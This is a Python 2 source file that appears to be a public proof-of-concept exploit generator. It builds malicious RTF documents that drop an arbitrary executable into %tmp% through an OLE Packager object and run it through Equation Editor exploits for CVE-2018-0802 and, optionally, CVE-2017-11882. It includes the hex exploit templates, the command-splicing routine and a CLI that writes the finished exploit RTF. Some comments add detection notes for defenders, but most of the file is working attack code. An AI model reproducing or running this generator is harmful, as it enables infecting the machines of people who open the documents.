import argparse
import os
import struct
class Package(object):
    """
    Packager spec based on:
    https://phishme.com/rtf-malware-delivery/
    Dropping method by Haifei Li:
    https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
    Found being used itw by @MalwareParty:
    https://twitter.com/MalwareParty/status/943861021260861440

    Builds an RTF ``object``/``objemb`` group of class ``Package`` (an OLE
    "Packager" object) carrying one arbitrary file.  ``build_package`` returns
    the whole group as text: the RTF control words plus the OLE1 stream as an
    ASCII hex dump, which is what the ``objdata`` destination expects.

    Python 2 only: every ``.encode('hex')`` below is a ``str`` method that does
    not exist in Python 3, and ``len(...)/2`` relies on integer division.

    Defender's note: the label and both path fields are the literal
    ``C:\\fakepath\\<name>``, and the ``Package`` class name, the
    ``01050000``/``02000000`` OLE header words and the ``0105000000000000``
    tail are fixed strings in this generator, so they are stable artefacts to
    match on when triaging RTFs it produced.
    """
    def __init__(self, filename):
        # Only the base name is embedded; the on-disk directory never reaches
        # the object.
        self.filename = os.path.basename(filename)
        self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
        # Original path and data path are the same fake path.
        self.orgpath = self.fakepath
        self.datapath = self.fakepath
        with open(filename,'rb') as f:
            self.data = f.read()
        # RTF wrapper around the hex-encoded OLE1 stream.  objw1/objh1 request a
        # 1x1 twip rendering, so the object is presumably invisible on the page.
        self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
        self.OBJ_TAIL = r"0105000000000000}}"
    def get_object_header(self):
        """Return, as hex text, the OLE1 object header that precedes the
        Packager stream: version, format id, the NUL-terminated class name,
        two zero dwords and the byte length of ``get_package_data()``."""
        OLEVersion = '01050000'
        FormatID = '02000000'
        ClassName = 'Package'
        # Every length is a little-endian uint32 rendered as hex text.
        # +1 accounts for the NUL appended after the class name below.
        szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
        # get_package_data() yields hex text, so /2 turns it back into a byte
        # count.  build_package() calls it again afterwards, so the embedded
        # file is hex-encoded twice per build.
        szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
        return ''.join([
            OLEVersion,
            FormatID,
            szClassName,
            ClassName.encode('hex') + '00',
            '00000000',  # two zero dwords; their meaning is not given here
            '00000000',
            szPackageData,
        ])
    def get_package_data(self):
        """Return the Packager stream as hex text.

        Field order: StreamHeader, Label, OrgPath, UType, DataPathLen,
        DataPath, DataLen, Data, OrgPathWLen, OrgPathW, LabelLen, LabelW,
        DefPathWLen, DefPathW.  ANSI strings are NUL-terminated; the wide
        strings are UTF-16LE, prefixed by the ``len()`` of the original
        (byte) string rather than of the encoded form, with no terminator.
        """
        StreamHeader = '0200'
        Label = self.filename.encode('hex') + '00'
        OrgPath = self.orgpath.encode('hex') + '00'
        UType = '00000300'
        DataPath = self.datapath.encode('hex') + '00'
        DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')  # +1: NUL
        DataLen = struct.pack("<I", len(self.data)).encode('hex')
        Data = self.data.encode('hex')  # the embedded file, verbatim
        # NOTE(review): the OrgPathW pair is built from datapath, not orgpath;
        # harmless here because __init__ assigns both the same value.
        OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
        OrgPathW = self.datapath.encode('utf-16le').encode('hex')
        LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
        LabelW = self.filename.encode('utf-16le').encode('hex')
        DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
        DefPathW = self.orgpath.encode('utf-16le').encode('hex')
        return ''.join([
            StreamHeader,
            Label,
            OrgPath,
            UType,
            DataPathLen,
            DataPath,
            DataLen,
            Data,
            OrgPathWLen,
            OrgPathW,
            LabelLen,
            LabelW,
            DefPathWLen,
            DefPathW,
        ])
    def build_package(self):
        """Return the complete RTF object group: OBJ_HEAD, the OLE header hex,
        the Packager stream hex, then OBJ_TAIL (which closes both groups)."""
        return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL
# Minimal RTF document envelope.  create_rtf() places the generated object
# groups between RTF_HEADER and RTF_TRAILER.
RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""
RTF_TRAILER = R"""\par}
"""
# Wrapper for each Equation Editor (Equation.3) object.  Per the RTF spec,
# \objupdate forces the object to be updated before it is displayed, so the
# objdata is processed on open; the objclass/objupdate pair is the usual
# anchor for detection rules targeting this document family.
OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
# Closes the objdata group and supplies a \result fallback: a static WMF
# preview (the hex appears to contain the strings "MathType",
# "Times New Roman" and "111"), so the object still has something to render.
OBJECT_TRAILER = R"""
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""
OBJDATA_TEMPLATE_0802 = R"""
01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1
B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001
0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05
000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000
00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006F
006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF
FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008
00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02
CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E
30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF01
000000000000007C010000040100003C0100000100090000039E00000002001C0000000000050000
0009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000
000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF000010000000C0FFFF
FFC6FFFFFF20020000660100000B00000026060F000C004D61746854797065000020001C000000FB
0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF5F
2D0A6500000A0000000000040000002D01000009000000320A6001100003000000202002004F006C
00650050007200650073003000300030000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000180002000300000005000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000040000007E01000000
0000005200690063006800450064006900740046006C006100670073000000000000000000000000
0000000000000000000000000000000000000000000000000000001C000201FFFFFFFF06000000FF
FFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000A
0000000C000000000000004500710075006100740069006F006E0020004E00610074006900760065
000000000000000000000000000000000000000000000000000000000000000000000020000200FF
FFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000
000000000000000B000000C500000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000020000A00000026060F000A00FF
FFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D00
0048008A0100000A000600000048008A01FFFFFFFF6CE21800040000002D01010004000000F00100
000300000000000000000000000000000000000000000000004E414E490000000000000100000000
00000001000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4
EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
20202020202020202020202020202020202020202020202020202020202020202020202020202020
202020202020202020202020202020202020202020202020202020202020202026908B44242C662D
51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550
494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000
00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800
0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000
0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000
1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00
FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020
20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000
00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400
00002D01010004000000F0010000030000000000
"""
OBJDATA_TEMPLATE_11882 = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""
def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
    """Splice ``command`` into one of the OBJDATA templates and wrap the
    result as an RTF Equation.3 object group.

    Args:
        command: ANSI command line to embed; space-padded to ``max_len``.
        objdata_template: OBJDATA_TEMPLATE_0802 or OBJDATA_TEMPLATE_11882
            (hex text wrapped with line breaks).
        command_offset: offset into the flattened hex text (the callers
            pass a byte offset multiplied by 2) where the padded command
            overwrites the template.
        max_len: capacity of the command slot, in bytes.
    Returns:
        OBJECT_HEADER + patched hex text + OBJECT_TRAILER.
    Raises:
        ValueError: if ``command`` is longer than ``max_len``.  The message
            says "shorter than", but a command of exactly ``max_len`` bytes
            is accepted.
    """
    if len(command) > max_len:
        raise ValueError("primitive command must be shorter than %d bytes" % max_len)
    # Space-padding keeps the patched span at a constant length so nothing
    # after the slot shifts.  Python 2: str.encode("hex").
    hex_command = command.ljust(max_len).encode("hex")
    # Drop the template's CR/LF so offsets refer to the flat hex stream
    # (Python 2 str.translate(table, deletechars) signature).
    objdata_hex_stream = objdata_template.translate(None, "\r\n")
    # In-place overwrite: the replaced region is exactly len(hex_command) chars.
    ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER
def create_rtf(header, trailer, executable, double):
    """Assemble the final RTF text.

    Document order: ``header``, the Package object carrying ``executable``,
    the CVE-2018-0802 Equation.3 object, optionally (``double``) a
    CVE-2017-11882 Equation.3 object, then ``trailer``.  Both primitives embed
    the same command, ``cmd.exe /c%tmp%\\<basename>`` (note: no space between
    ``/c`` and ``%tmp%``), i.e. they assume the Packager object has already
    been written to %tmp% under its original name — the drop behaviour the
    Package docstring's references describe; confirm against the target.
    """
    # CVE-2018-0802 exploit
    ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
    p = Package(executable)
    package = p.build_package()
    # Package group precedes the Equation objects in the document.
    outbuf = header + package + ole1
    if double:
        # CVE-2017-11882 exploit
        outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43)
    return outbuf + trailer
if __name__ == '__main__':
    # CLI: -e/--executable is the file to embed, -o/--output the RTF to write,
    # -d/--double additionally appends the CVE-2017-11882 object.
    parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
    parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True)  # typo in help text left as-is (runtime string)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true")
    args = parser.parse_args()
    # Text-mode write: the whole document, including the embedded file, is
    # RTF control words and hex text.
    with open(args.output, 'w') as f:
        f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
    print "[+] Completed!"  # Python 2 print statement; the script is Python 2 only